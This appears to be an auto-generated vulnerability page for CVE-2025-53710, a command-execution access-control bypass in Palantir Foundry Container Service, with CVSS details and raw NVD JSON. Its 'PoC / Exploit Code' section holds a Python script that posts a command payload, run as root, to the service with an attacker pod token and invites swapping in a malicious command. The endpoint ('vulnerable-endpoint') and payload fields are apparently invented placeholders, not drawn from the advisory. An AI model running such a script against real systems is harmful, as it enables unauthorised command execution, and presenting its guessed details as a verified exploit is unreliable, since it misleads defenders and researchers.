Security Vulnerability Report
中文
CVE-2025-53710 CVSS 7.5 HIGH

CVE-2025-53710

Published: 2025-12-18 21:15:54
Last Modified: 2026-04-15 00:35:42

Description

Due to a product misconfiguration in certain deployment types, it was possible from different pods in the same namespace to communicate with each other. This issue resulted in bypass of access control due to the presence of a vulnerable endpoint in Foundry Container Service that executed user-controlled commands locally.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Foundry Container Service (特定部署配置下,所有版本均受影响)
Palantir Foundry (受影响的部署类型)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-53710 PoC - Foundry Container Service Access Control Bypass # This PoC demonstrates the command injection via misconfigured endpoint import requests import json TARGET_URL = "https://<foundry-host>/container-service/api/vulnerable-endpoint" NAMESPACE = "foundry-namespace" ATTACKER_POD_TOKEN = "<attacker-pod-token>" def exploit_command_injection(): """ Exploit the misconfigured Foundry Container Service endpoint to execute arbitrary commands on the local system. """ headers = { "Authorization": f"Bearer {ATTACKER_POD_TOKEN}", "Content-Type": "application/json", "X-Namespace": NAMESPACE } # Malicious payload to execute commands payload = { "command": "id", # Replace with actual malicious command "target": "localhost", "exec_options": { "timeout": 30, "user": "root" } } try: response = requests.post(TARGET_URL, json=payload, headers=headers, verify=False, timeout=10) if response.status_code == 200: result = response.json() print(f"[+] Command executed successfully!") print(f"[+] Output: {result.get('output', 'No output')}") return True else: print(f"[-] Exploitation failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def check_vulnerability(): """ Check if the target is vulnerable by probing the misconfigured endpoint. """ probe_url = f"https://<foundry-host>/container-service/api/health" headers = { "Authorization": f"Bearer {ATTACKER_POD_TOKEN}", "X-Namespace": NAMESPACE } try: response = requests.get(probe_url, headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Target appears to be accessible from this namespace") return True except: pass return False if __name__ == "__main__": print("CVE-2025-53710 PoC - Foundry Container Service Exploitation") print("=" * 60) if check_vulnerability(): print("[*] Target is accessible, attempting exploitation...") exploit_command_injection() else: print("[-] Cannot access target service")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53710", "sourceIdentifier": "[email protected]", "published": "2025-12-18T21:15:53.510", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a product misconfiguration in certain deployment types, it was possible from different pods in the same namespace to communicate with each other. This issue resulted in bypass of access control due to the presence of a vulnerable endpoint in Foundry Container Service that executed user-controlled commands locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-653"}]}], "references": [{"url": "https://palantir.safebase.us/?tcuUid=4dbae101-79da-433c-8184-c70b78f4701b", "source": "[email protected]"}]}}